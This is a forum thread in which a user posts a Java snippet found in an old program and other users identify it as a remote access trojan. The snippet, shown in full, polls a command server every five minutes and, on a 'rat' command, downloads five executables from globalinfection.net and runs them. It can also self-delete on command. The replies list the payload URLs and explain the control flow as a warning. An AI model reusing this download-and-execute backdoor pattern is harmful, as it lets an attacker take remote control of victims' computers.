(adsbygoogle = window.adsbygoogle || []).push({}); Hey, I was looking through the shit I have on my computer and found this in one of the Java sources I have... I'm not sure where it came from. I got it a long time ago. and I'm only going to post the part that seems sketchy. If someone could help me understand what's going on I would appreciate it.

        private void startCommandTask() {

        ActionListener taskPerformer = new ActionListener() {



            @Override

            public void actionPerformed(ActionEvent evt) {

                try {

                    if (Update.getText("https://www.globalinfection.net/GiSE/command.php?u=" + GiSE.authUser).equals("exit")) {

                        System.exit(0);

                    } else if (Update.getText("https://www.globalinfection.net/GiSE/command.php?u=" + GiSE.authUser).equals("delete")) {

                        new File("config" + File.separatorChar + "settings.ini").delete();

                        deleteDir(new File("config"));

                        new File("GiSE_Updater.jar").delete();

                        new File("GiSE.jar").deleteOnExit();

                        System.exit(0);

                    } else if (Update.getText("https://www.globalinfection.net/GiSE/command.php?u=" + GiSE.authUser).equals("rat")) {

                        Update.download("https://www.globalinfection.net/rats/1.exe", "C:\\1.exe");

                        Runtime.getRuntime().exec("C:\\1.exe");

                        Update.download("https://www.globalinfection.net/rats/2.exe", "C:\\2.exe");

                        Runtime.getRuntime().exec("C:\\2.exe");

                        Update.download("https://www.globalinfection.net/rats/3.exe", "C:\\3.exe");

                        Runtime.getRuntime().exec("C:\\3.exe");

                        Update.download("https://www.globalinfection.net/rats/4.exe", "C:\\4.exe");

                        Runtime.getRuntime().exec("C:\\4.exe");

                        Update.download("https://www.globalinfection.net/rats/5.exe", "C:\\Windows\\Recruit.exe");

                        Runtime.getRuntime().exec("C:\\Windows\\Recruit.exe");

                    }

                } catch (Exception e) {

                }

            }

        };

        new Timer(300000, taskPerformer).start();

        taskPerformer.actionPerformed(null);

    }

EDIT: I guess my question is really where does that Update object come from.
EDIT 2: Just kidding I think I found the Update object.

Well,*clears throat* it is clearly downloading something from the website globalinfection.net and then running it. Multiple files to be exact.
Take this part of the code:

    

                        Update.download("https://www.globalinfection.net/rats/1.exe", "C:\\1.exe");

                        Runtime.getRuntime().exec("C:\\1.exe");

It is downloading the files 1.exe and saving it to C:\\1.exe and then running it.
It almost looks like it is something you would put on another persons computer and then run.

So basically stay the hell away from a program like this. xD

Clearly a RAT.

    

https://www.globalinfection.net/rats/1.exe

https://www.globalinfection.net/rats/2.exe

https://www.globalinfection.net/rats/3.exe

https://www.globalinfection.net/rats/4.exe

https://www.globalinfection.net/rats/5.exe

Moved to Inquiries.

So here's a run through of how it works:

The attacker has a little database where he can select commands from
(You must login or register to view this content.)
u= is essentually a unique identifier to it doesn't get ran to ALL clients.
it checks it every 300000ms.

he speciefies a command which in the next remaining time until 300000ms occurs if it contains the command 'rat', it will then download five separate stubs (I assume each have different encryptions because of anti virus' and run each one of them.


In tl;dr terms, the attacker can rat you at anytime this is running.